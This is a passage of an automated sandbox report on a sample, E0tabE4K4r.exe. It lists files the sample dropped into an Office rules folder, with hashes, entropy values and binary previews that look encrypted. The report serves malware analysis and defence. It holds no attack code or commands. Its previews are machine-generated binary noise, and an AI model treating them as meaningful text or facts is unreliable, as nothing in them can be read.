                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.871384848140674
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fR7vKcLszfTXXCz8fYxi7XjbNI2051J1jrzhD:fdvKcLsrTnbLbNIn1jrt
                                                                                                                                                  MD5:DF875CA8EB53BD92B9B355D393B319C8
                                                                                                                                                  SHA1:38828B3E328DD0BFB9D0E8B9AA667E4E99CCD13A
                                                                                                                                                  SHA-256:10A03FE7A315E774C323C87C46D40A2F5E6E9C22119D7DD97C2E4609C77EF7A2
                                                                                                                                                  SHA-512:D4987F4343A55A7CF123FB2246238BA0B87D78902F6FA670026E1BD9C361C50E7B742BF2576B85A5356752DA6E3255DCF852DE53BD3A123FE6288BB61588D449
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..:.....*.....s.@AyEC......H..-/...D%.jF..O...^F..J..Qc.....j...#.%V...!D....N...].iCsCuC.E.!...u9...%k3..b...c+S...96<...u.V$L?g.........}.S.Y.g.*.sz.).R.r.+B .....G0.&..}$.+..xog..y.X..&....+..%."..U..6.D....$.........a..]=NQ.O.o..?H."...')..B..._.8.....|k -....<..N.%.+.:"..X.w`O.|.'r.W.!.KxB&3.D.C`N^......q|..GH..B..4.]j\/4M...Vo..F.P........2j...y...n 3vC....%,.qoik.4..KS5....lh..}.._@....k.:..!./..n....81.Vj<..5...e.....r.1...;.?|......1.M.A..y@...3.5.^t..}....($v-..q....L.8....]oe"M.....O.b.....o(..|R_)4`......a..&5....=;.BH#...I..*y...M. .._....F...@.....m..x8....@>.........~.>...e..*.@....a.......Y....M../++..A...d.`.....#..q.u....TVL.........T.M*!.....%.[.}.&..%.R....@;1..e....EB...r.kg.....f.[.F..KE........5...%r"B"...T....]..K.......j9A...S......#. .9.b....@.s.!.......0....*.4,y...zh.+.LI....?......?"....g}..a.LYz..5.o..B.5.y.........cz.....O....ET..*Z.......X.....?.Lg....o..?......Y.hM...N.Y.g{Y.q.J.u....gW...v.. ..q.d'&*.r.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702151v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.8810083747252335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:HFGjcXb0S0Rd/J9iFAngtxn11IyzAum0irBD:HFqcXb0S03PiFxxzIysd0Op
                                                                                                                                                  MD5:B4FA504E1CCB106F779586F0BB97CA55
                                                                                                                                                  SHA1:9521050CB114BD9EEC6F98F276213E842BBFD20E
                                                                                                                                                  SHA-256:512658ACAD696332058B864C5FAACE7488507BF57DED9E7C4840B74D4607C608
                                                                                                                                                  SHA-512:63CE1EBEE0A92DDEDEEA113CA60E2181DB22DE581D519C0E0FA9354D32FF20CC0F0D0F0A7557D170EDA05D7077F0031E38B785BE9347917F27B488F851B4CD8F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlL.<......d... c5.....^.*J......M.B.<9.....6u..2.'^`.=4!.J.8......r~l...U..".|.......o.y.q`7.......{..c-.I._f......G..0.J...M..Cy..%.....9.P .I@0?.r.l.t....pz]$~DH..&B.... ....$&1.......Lx..;.[6k....&.=.7.&.....J......&....@..$7Q....g.I..:.<.4 8D...#../...@.2.>a,..E..]u..4.W...Z..j..U.|..#v..r..e...(..._.3\.....n.~...+.sZ0.....f.T...H....s..vm...?.I..k+...O...2z.1..Us8.|V....7X.......<b[...q.M.c.4........`.....~KsB>..@eZ.y..b..5...`5.C...h}... .....^..Od..U.T+/........<..].K<.0[.B|$.$...8....a....i.+< ..^.`I$*_..KO....v.........Ut.o.!I.+.$..a.`...c.).=.LklMo...t.w(..3.4..(W...YI....$u../.z.M........L*T...n....AS.NA.).k...M....u!n]~..P"9<..i...C..(..`...?.h..\.L2.z..{.D......#A1.J'..L."..w>.>V.......SJ.C.{R1..8.j6...=..J....Mw..*G..u.<Od......;..aD^W!............Y.J.U.R.u.89..p.Q....y.......zB.{6=.V.R...%...........".....2).....{.#.dy..........d..}.w>o5-.l.62s.~TV.G.)3..v.zsK.m-...O...5.l....._Co..>...q.....K..h.K^.|.z...^..xR.i......D.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702200v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.888074407099652
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wsiYS1YO2Wivn7Qazne1SWMG2rX8tnPcYojeKSS5QxtVtAvRLcAFew046lf2bD:wsiYS52lDQaj9BFrX8SdC7lxtVSFvq8D
                                                                                                                                                  MD5:7D214FAE9CD1ABAFA03F0589C1D01B0C
                                                                                                                                                  SHA1:F812061CC589EF8657AC1285D6A8F466A3CDF5A8
                                                                                                                                                  SHA-256:D7AE41A6A6C0BFF04F0BBB643E26C87C785AC1D0A5391B0DA2309FAF5DF409CC
                                                                                                                                                  SHA-512:DAB0C445404A3ECBB2F99C43CD54AD0C863EC04BED3ADEB4EBE586D828FA568F590470613C3C6AB73B329269D9A7B9E36DB0698189B5C91C8E980C26F8D15205
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlMw....-1.?..W..[.Z}...@.E.S./!9..j..!..M......n.........c.D..B.?c.0...$5`".9..&...&CS.}..M...g..../|..S,..'.6.l.,.@9....:..G.>.h....SQj.n....@U:..Jl...Z.........T.........(..7E..b."..O...I.J.jT=...A..+.d*...T.*#.n.....^.`V.s... 5$@h...B.&)e....{#G.6..7.E.@.:..3gM.gO~.d...o.k..1>...@..(.....,^..t[.*8C*..._:....C.H............q2...w.W_....}.....U=\&.s.'.L7+v:.26}Ol.&[^..9...=..........9....S.....:.H..P..VI.A.......W..&8.d.....P-.u.G.G.%.X.FX.CW.....V.....-.ND.BB...._.I'..nh.\...DN...X.."...nN...%...........i.~u..\..[...jEBI.H.b..H:.4.....n.R.....#._=..?.!K..9.l.........C{.a./.Yv...0.....mT..".T.......~m...8.......cl...f.,a8c...)65..]......z..,.. l.....K....6..k.Q.sx...HY.....uw...A..O........=l<.s...'[n=.'5V.]..i...T.p}..?j.C^.P..1...:.+aQ....(_....;.FUPC<...P.s..(P.9...>..5Ry.^/U.f...i.*.93H.+u+N......7{..E......[..`.l.......G..O.?=.i...p......v....R...u...b...L....pA.p0.....:..`h;....{.u.n`.r..YL.+.._Rz......3...m1...uv...6..\....:....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702201v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1730
                                                                                                                                                  Entropy (8bit):7.895294640800411
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:RvfPtiNKIR2aPoDRfST5dKMNrNBYsWIYlj8/D:RXViH4R62MNr/FvYir
                                                                                                                                                  MD5:1A651AA5E33EA346ADE13EE88D325583
                                                                                                                                                  SHA1:90604844DAA88D96736BE01EA1616A34F3E9AA7C
                                                                                                                                                  SHA-256:DFF78E80D33EDB8AB2A22C6D9892917144A5C7B92625EC3DA2E6ADF18F266103
                                                                                                                                                  SHA-512:7571BFB5FBB06F918D61CFCB35F81D9BD4A221B8328473B7D7FD0C251FD1A0ED2CC6175964D3299E3997B4D5CC318742E85ED3ADA4E08844332091E1420F4F61
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmla.~r.`.....z....L......$,..E..#........+...#.\_.6p........7=......O..8.L.........\a..qH9a......ya9O..I....UD@.u.-.M...}.D.H.]jkH..w.....9.g.W.e5...*..xCe{.._%.?.3?..he...#.9.cB..et.\.AX\.........F.rx..n..u..#EB.|.b].....8u. _..0../aH...f=L..)..oM..p7..;.{}.....+-.x}...3.=......=q. \+(`.......,.#.uW4.8..;".[-.....]...zhB~..7._.0H....S.y.ov..[.TR...sPC.h.1c|.DZ#..hF%....gFuQ.VCTP.PA.?.f.."../.k.4W......_V.....w*..Lf...%.`&..F.w....1.mF..c/D.h....t;b....OY.}..K...w...|#.J.I.q!X.V.....j.H..._..A...N.d.W:...h..}J...AB..a?.we..3-.....cC.s.w.0.".s..;..r4Q.S..[j..... ...!...$..MfS.....L.0.8..LI.w.......Z.......j.F.`.._..wo..!...bk.v..bX...........E.`|....H..!j......P...T.....?..a.@?.b.7.t...7Z....r...>..R;85$E....<.e..%...@.....s..v.m8.!F^.gK2G.....,..=M.8..h........7.e/..a?>..k..n..hf...J..w.yg...^O.(.....5I..6...M.a.._...6.@'=.7...&X...H.~.>.i..._..C!5...b.c.%....J......W......e.M...G..@.2......Ad..-.Q:......e..W9B...z.../?...P.$....<..;]...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1685
                                                                                                                                                  Entropy (8bit):7.874632798482379
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:cqgqdsI0WNYJnvNPCzRJXQ+fFFJCoyHfqhy3/WID:cqgqeZ5yBLJ5WfB+U
                                                                                                                                                  MD5:9A22F820F39CA467E6A8A92691222D15
                                                                                                                                                  SHA1:32014CDA7205B7F5CDC62247DB957FA8E5D9CE7A
                                                                                                                                                  SHA-256:9E4937AA545A457DD607CE46890CB73C535A0599505017D149999A193CC31DC2
                                                                                                                                                  SHA-512:6AB1C95189D4EE5E4D2DBD6A8B45915D8A86C6177A1BDABF1378143ADAB5D7681E134A9599E1CBF68EF2F66ABA3BF40B793B7C72DAB7D4E6E83B4E7B4DDA423A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..X}.!Tk....{0.M...q]..p...m.l...Z.d.V..vG...f.>3.`.p*.NX._/...m.iG.Sn...a.*N..h......NM../aY..b.$.J....T.f..8.;*.5..@.t..8@cx>..v.~.%.....Ig..88x.........k.s.U.=..N<(.I...g..eS....7."....`>._.{.X.| 8...*...`Q.}].R.....@.wYU.d)......_.3.._H{.......R....A#....).."aq...BP...5...)...N....l.6......Vd(..V$4..).P...........l{j...%..*n.m. %..s.k.....q......>..?..s.y.....8.v...l5..NM|`l........4.B.u..Z.....6~..%.n.\Bug......K/O....on-W.U......{..&k..~.>K].!.=.-".{...r..Bf.^&Z..<.Y...l?...V. u....9c.u.C&U.M.H..w.......n3 ..A...W..<.H..}...J.0...H.f:.q.pd.[.@..G.=...<.....ps...$Zj.oY.....z3..W..M...."...;P.....s4..EO08...J.E.b.l. .....V.W|V..*.]..._..a....#.uQ.~.{..|...v.R........4.....0*.S.@.}.....U.....)q.]...J..2.._..l(...w....fq5%.2.........4e......KM.B.T.(VZ.ml...Py......Q.R.e..<~To.>.,.2.m.$......|..@..A?..S........@..mU0....|..Q.G..q>".......Q9:[O*z.DwS..J..........x.........x.2}Y..X.V...S....XG.........\T.6......{k.M.......49>z.Y&

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1722
                                                                                                                                                  Entropy (8bit):7.880274600650004
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/ph5g1MwiMqH3lM+GivmYICZxFG0mSO913ZfBCpgn8J3prD:xgMdMB+DuYICZCjL9rfBO
                                                                                                                                                  MD5:3D8B83473B3D8C48F33ED00F0A7F194A
                                                                                                                                                  SHA1:3A836B7CC34B5589A9B7577C243D4B2F269090AE
                                                                                                                                                  SHA-256:A064C72BD3714D8D65912E689D90920CAFFE3EEFBAA149F4438005566DDC0F05
                                                                                                                                                  SHA-512:95A8D33E3FDFCDD7F719675A09410475948317DE2BAB3755C38E0572AFAB57174C7088EE7D7B515689DD3F4D91235F42348DB31B00791647CB61870D2794B2A7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlv.M.]..e.K..n.].~..........95.|.....J...N.&L.o.mc..QL........$.I.m.5..8.....DZ....d.."..u....a...........)...4........._...%."...q@7T "E...Q.a1X..58...t.4.p...f".4.....`2"..RAo..*......VJd....;H.>8.s$....|.bq....N_.K... .k#.r_.m...G..+.Hw.X.:T.6.O...x....f;..>....2Km.....0....2.g....C.T.....3..O:...-P..cQ..01...^-.<.{.}D.fG..h..B.Kast.",.......D...7(...Dx...G...T..^.0......!L...S...q..;^..N.Qy..c..jU..Edi-.!..X.F4....)..C.{Zu..n.....N.......g.,.eD8.F.....3.w..3kN.o.b.....J...5..../...)...~...vG...)q..j..[E..5+...K*......). -8..jkh.x....B]g&z*._|[. ..LtW.S61Y..V[...2..[.....T..EB.....k...qj..{].X.......eF...k.".s...n.......V.,pU...Jk.sV.k.l.:..-...k........of....h.&..._j..zf[.....*.2j.....=Z..q.3v...T..a..B..]/.....Q.<..z.\...N..>[;..v....DPyh7..xL.*....J`y.\....nj.K..f..........=..kV....N..L....a9.^71..*k.u.........W\u.^...z.S0NpZ....)...9.S)....o.....'.G..:..exa..A...z...I:..w......../...T9.e...~E......x...M.q!...A..1JE...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.866091256678933
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:osf7UYUyYAnX3NH5jJkI+Dd2QpWLvLwErZfU7CZD:1hUm9H5jl+DdHWLvsE9ICR
                                                                                                                                                  MD5:B5741E1867B8AAC64409AA5F343BD883
                                                                                                                                                  SHA1:BF7E726C55FA51E1AB2069FCC101243C092DC236
                                                                                                                                                  SHA-256:B340EA723D167DEDD4C52054BA71B6E57C6A70C36A79DA54DEAA23690AC36640
                                                                                                                                                  SHA-512:C4B0DF61D17D3D0CB7E48216BF0917CB69F52BCB897115923651AA27B8547CA6D7D0CD11C18A3B667B25F8C8368ED423F6E3CAB5A060BB409A29256D5F698B34
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.fU.e.^......u..+o...6.1.o..p....g..^.b....v...^y..)S....X.o%7...~...d.k.J...FG6:.B.A.....8....a...F.....P...J.{...U.4...+.&.Yi..s!......:...Hd...Bc#y_.J.o9...m.....uC.\.=..8....8.m%..^6.)...j..!.E..43.{@(.L).!.......0.$.....*J...7m...\g>...LX..i..94S*..|y5...xh..X...d.....a..E2.....r.._. ?h.G)..r]Q..lp.r.3Y.7....U.......YMv..<R.>.3%i]v%:H.hh......i.... ...T.;.HG.8...X.ZW...?......C.Z.T.[..i.:.p..........=..zL.W.x....6o=@..g.....[.."..W.:.d..hZ......)7:.....T....[A...[/(....a%.......M?c;..I.9._u..n4.._k..... P..z....85.>.|.t].).....+H.4...3U.....(.....*2e5.....r......b.4.l....;..|.%...:.w..)o.a......nig...e.,.6..Edlg^<.|.!.J..jG.?A...J.wi......7.`......`4.(.3r.[..&.....J.r#.k..e.d`xX..{.%.h......WLp.....4....Z.].>......\=.r.J)f......y.G.q..B..n....hLr(....u.X.elZ.[.....-.8}.J.b.@;..U.-.p:..N.l.F.3'........c.k..z..c.?..S.*.G?r!pY..;hq...H.9;..Qc..A..."......b332.f..$..m..B..Y./........6.."A.V.p.|...>...i..t.....%..6:..7...B...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.884550645205345
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:N7Du45HNvPDF3tc/6yM/88QPSLYX3Y/nFtNO/g4/qwRXq5AQ88F+6nFG4sDwZgCq:Nztn53tmZPaO/g4/qwzH8sGfsDwriD
                                                                                                                                                  MD5:6474BA8CD6EA8D9C54D1AE823387E9D0
                                                                                                                                                  SHA1:2D3E03D2B09CC802D793CFF071C5B3D310FE3F4C
                                                                                                                                                  SHA-256:4A115C7243E5192082636DC49E1F7C7337E44747DC0C9941867862267AFD4AA5
                                                                                                                                                  SHA-512:DE6EB53C0C2BC506FC3D59C6FF21AA2CB32853925727860059E0D7E9859B5C5289E34EA6D80E39ACECA5907D306A9F396E592177DD2F24B64810D144A393DFDF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.g.v...].{[..B...g..RI.2..bX.3...s..-e.:......(.2.f..:.....6...I(..m......Ww,.Y..**\.E..w:..C..2.....R..LQ...n..n.OV......8...wT.2.YK..x....<\y....J6\....~..1...zf....}.N.1..Z.y.......t...D......I)...."..C.f..........K....f........T....Vq.qE.>@ .y.o..3..y....2.g7...0.....;X.......\..m._jd.9...Fp.4.`O'?E......B-.-.........H....3.x.l..C,.:..Z<. T..@^.....e.d.n..gs....869.O.....&(.%../.....3.1.~...l..L..Xl#...z.+2....u$..ET..g`.Q...6.y+......"Gu.e..46"m...2..DSZ.&B9...&=...M<:...>W^G....2.....9. .M4.....g"9.0.+..t..%..O.........VD..t..Nk4:.....cO.i....{..W..w.....d..K..q@.\.U...hz.\../.t.<./.;B.i./.D~.JF...#{p.?.D........F.k......).....~..3...$c..[Y].@....)........25jQ...H.t"#g....c.p.-\..Y.X.I..4....]...9s\8.Q..S5{.S...><gd......K.+...=.Y..T.3...Y.AHI......x@......n..r..$.....2=%.2...v.G.N..$)d....L..!...rH..[DT..KMK..#.J..Snl.....{..@M.n...%..zk..a.:.5.5Pa",..=.W..r).3...n..aT..j.@.v.A.JWL.eZ.Z..W.\.P.I...p....Cm|.s>gwM...q.c

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1691
                                                                                                                                                  Entropy (8bit):7.875163066020063
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:bq8hnVrNLVKyMxLVZdZhYseBX52HD0KZMJfU7D:bVJLV34L7h+zlRi3
                                                                                                                                                  MD5:B3CBD00843B24E38F0796BE188BA88E8
                                                                                                                                                  SHA1:3796738F9C8E37EEDAD3391687EAEB6E11585B89
                                                                                                                                                  SHA-256:CEB5F0DEE333DCECD1EFC36E51D277B5A4016B958878066C0CF7DC08FAC8758E
                                                                                                                                                  SHA-512:DF97652E48D11734AB92894E49D2A6B5D291F69B08F543B97ADAB1EC6290EE94EB5DB443FE25C7B9B21ECF232D07F35D9E94B6526A5BB03788AB70EFF23DCD72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml;.>.sB^...._.tC.\p.<ju\'h..:....".bn..|..\8..2.@..9y..S.v.`.@.+.}q.g.&1...f.B.{l.......K......B.F".O.|.....=..........&.f.VK...m....[....w...F..%........;z.. r... ........qc.l...zjl;.Z1.f.T....!.....yW....y.._..."yX..g..&CR...5\.4.f....vt.t.kyOu....OA.,:t@..[......c:Z...;..18.*...;..%..f.A..mPx..w..>.!.3....E.\...A.ncl...........?}5...<..s...J.pk.O.....L..(.....`..W..i..._.I5t.Z..{..W.i.I$~.K.aY...O..=5.(.W|.q..b&.....c=;.8d..c.n..A..D."...t..../b...$.lI"/1.=.o.X..A..k......7h...L...R.....u.....t.')d.B.."..~. Fv&.@m...o.P.k....{...j.....b..n.}="..E........dqo}PA.G~.+O...].........?A../>....x..=..r........MR`.I.5........j..9..C.....B...3v.....4.....4...c....v\.q...q?...."..s..6#Y61.@*. .*......'PX..|.,..@.i.e..1..\..fj...]...h......5.a........|U...b.0..dY6:z.6;.0P..s...0"d.O.|......../...:..;g......P. ...bM.G.b.....iG.....Y.......1...m;Q8..Wl]......|....&..tL..e.8...w..6auPT.K......0.}.\p...K..G...P\.9`.)D%F\...b...)..m..'{Y..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1728
                                                                                                                                                  Entropy (8bit):7.8990769314653555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sH8KEY7vIO8F+gq0Dn0Rj+ZG+XsoyY+1wJ8xeSngxJjxDeDhW3AvMmiS4qex+2bD:scKhvIOsDo+A+XJQC0eJxHeD81lD
                                                                                                                                                  MD5:F8617A28BC67A999AC9499DA2EF566CD
                                                                                                                                                  SHA1:402825DCCDE5BB3D8389F535F33D51C6A766D8E4
                                                                                                                                                  SHA-256:9F6D0CB9FDCF3D4FA7D65BCBC7FFD8FE8317F095498F8D59657DFDEC4CE72249
                                                                                                                                                  SHA-512:B7E244ECF250952FA4DF20EB0055276DE5DCE48FCDD26646E6EEE2A7E9CB43C9A16A83EDF23341AB492CC8FDD4525E23821FC81D0B69F168A78C8883B5959E2B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.q#.[....&.r{:....>......lS.7 8..B..}u......[..+.p...m.Y..1.L5,.~.l\._.".n.h....H.Z..#..}.V....Kl..4...M..3../~....|.WE.6JX..%..]....=g.......{)........&Jm.......>..E=&..|.X..1na..........#......(<7.......T.zd....F..>....I..t~......*.\R.971...E.#.&....v#....:.......2...1.F2vxUJX.$...i..UG.....W..5...b.;....i#.....j~=\.1.+6..b.ZPB...iS..".s...A..Al..k9O........B...O.-..%.N...]..~f.g...N..#...)>.Z.3..`..........hac...*.W.}..c....`."......i..p. .)....O&{.]$......;.O.d7.:...Z.............$,.......7!..J.q0~.jG....T....f.7.W.d....h.[..........]..k...%t%..L.D..~qy.M..c-f!B.x.f....'e?....jf...$l.s.L..g......d.n.MK,.....-.m...k...m........ff...U?bq...(5...n....w..pm..G.#0......v+....^........y.....~l...5..B.u.E..Q..8...P....Y.FJ.V.'.-.|...k@vN......:.u..G63.e&.-..dx......9..D.9/.....s+..P.P[c.P..hJ0=.....(k....`V.5.!..Q.R.P.A......fj.=L...g.p..5e^F.p^@J('bG.2y.e...5P.<....v>.(.k'.K...........c..,c+[X..(2}.d.U?0*...j...70...=.8..?.p.{ ....q._3@...z

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1701
                                                                                                                                                  Entropy (8bit):7.870517079599434
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:mtqq0JoYE/G+YYGSdAtKWxIAWFGoR3sHD:pMhd4IAvoR8j
                                                                                                                                                  MD5:81F7BD0321CB46EFF1A6FC1183F8ACB2
                                                                                                                                                  SHA1:E8E9B7B60ACFBB7047E52E4993EBB72149F82E1B
                                                                                                                                                  SHA-256:A14C8BBD7B7D82D990F183F2803328D8F5F88FD2E270C6ADB2ACF4992D78EC52
                                                                                                                                                  SHA-512:38032F1B187F4044D402B2EDD3994DB7150D4D456D881A8F30AAEC88FD3B76D53E4F6AAEB8CBBE59B3190996E58856D05FA236BF9423138601952320117CAB36
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..4!....C.pFk.Q...m......d..L..B.p...y....U.W.'F6......1w\.V.e...OK......Wp<C......;..{A...`.L..c.a5.,jb-:..T..(.X..2..8..D.8..1n.P..33....)|.....u.k">%....Mc...<,....f.7..y.....y..L..%.[}.pYR..}....Y.gAw{.i.}T.LLD..u....;A.@P.h.5.&....Ng..%.R}...x..Vo.Kt.p.V.....#..{?...[.#7.5.q*....e..Z.i.)!.@2.2.!}..m......|._g.>6.t.".]D.....;o....;..........;.g*.......A."zx.}...G&....v......b.4@Z5"Z..D!...Lz...=.H..f...{.*.$<...-n..l..M..}l.D.I...fZ(..G...........R........7..B...4..R)....@..p...\m...B................e~*...\G,C.W.`y....;..k...<yS..u$...e.....T.(#...Q.........eH..0L.=m5...|Fh....<...a...N.'..Q.|.a/....}[j.MHf%. ..1........!..b......<c.J.Yf......d.hW....zh....RV..5..*|J..[..5<9_.8...5.....a.0.3!z@..UD.........%........T...=.-.)..Io...-.._..".%.>.DkD.Ah...y..-...)5.k..\..0.\.._...h.,.5..}..c...15.l A.}.....n...l.......^.p...3>,..y.D.z.....sp .\S..;.....?s(..m.5.*.q..6..iB^....G..n....=.7...|V.lS.Ti..X..&....Y{.)_I....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1738
                                                                                                                                                  Entropy (8bit):7.890327487917822
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:T5x/NuQegs7Hz7n56ruZsg2F2kSsbzZypdhK//7D:T5RAHjzoruZsg2hSZe/3
                                                                                                                                                  MD5:E880AB80CE7534FB5BEB5E348B405261
                                                                                                                                                  SHA1:02C58467A846DA8A3E65648D996729707CD468ED
                                                                                                                                                  SHA-256:7C368790B09BC7268CA2D3583833380C2719785EB4B74D7FCFC3480A0F1EA7D4
                                                                                                                                                  SHA-512:05D09484D9B10DB79B11D97F358DE2355564F479994E2C112317E6CE2C2E4FF191B6543C36E6E80CA2F9D01E50E094B3329DDA2F6E652777112749B17757D080
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......[../...Y.xNl.*<.w.W...h.0O)..L@3.Iz.+zazK-.ho1...+....v..:Gh....k.R...Tc......r....OwT.B.L.Z..Q....Vu2..I.u....#M/~$....1..`e....!pNX.{z..._.&.WLh)......Q.....4..w.$...;.yS...O.d$F...r'.s..LK.. .....=X.O..V....k...U...F....".._.$.iw.n.....m-...l.k!..d\....5jE..A..Ie.9.y(....lk.>.L...K....K~.`CZ#.7]........}..TW.l.....n.*.j.GK.-!..t.t!P...{.2..4._G..Uh.ip.*.....t..../....X.<...H.)..{..i$w".%(.k...?A.=$...U....c...n.%#..>.,..~.KjY..Kd|.$.E..qT..`.M9.swQ...........D...]..z..............4.q{A.......a..L.F.m...Ul..J".......R.H.5`.J.^.,G..Wvd.A..XW.t..o.Xui.}...T..1D..XV..m........:.Z...V...!.(z..*.....0...K>.bC..v..F..)ZJ^.q..... .n.m....7....e.K..0.....k...V6N<....1:..lN....}2.C#..+..=....?.a..z.y.r.{..V0.~i...q.K..J...V..+Z$.f.Y.......n.6.....+[pf.h.l}2i.s=...Q.)D...O B.....y....*.>..jP.4fof.......)7!.x.Tq.[..y..p.+.k'.4.Wt.......z..(.."...jB.?.8...A;..`,r.....V..J.=;...I^..?Q...O......ePv...q....@......B..jJ..e.9%&

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1693
                                                                                                                                                  Entropy (8bit):7.891851785018354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:GKIsemDKtULbClEtLoB3L8O9ivJpso5IhV/Y8E9/fuKK3ivVXe+6fVzGBtJYtiY+:GwTKAeEtsBpHoahQ/fvvFIVzcAiYmD
                                                                                                                                                  MD5:B3B704EE8A4AA59F4271FE826D41C685
                                                                                                                                                  SHA1:0F3BE7568654EC7AB99483CE7975028709DE6693
                                                                                                                                                  SHA-256:2A439A1C1CB4E2C2A28C6890CAF17446F75602DC7BDF3BEAD7A045D5CD73E506
                                                                                                                                                  SHA-512:B86645C4B5EA7D3D1FA22805307CFBBA3A00CFCF90C3AA9F81480B203C9A6F3AF7201E5BD2C9505DED2FB3390798FBA89EB080544BAFC4FE05B030F8FC935253
                                                                                                                                                  Malicious:false
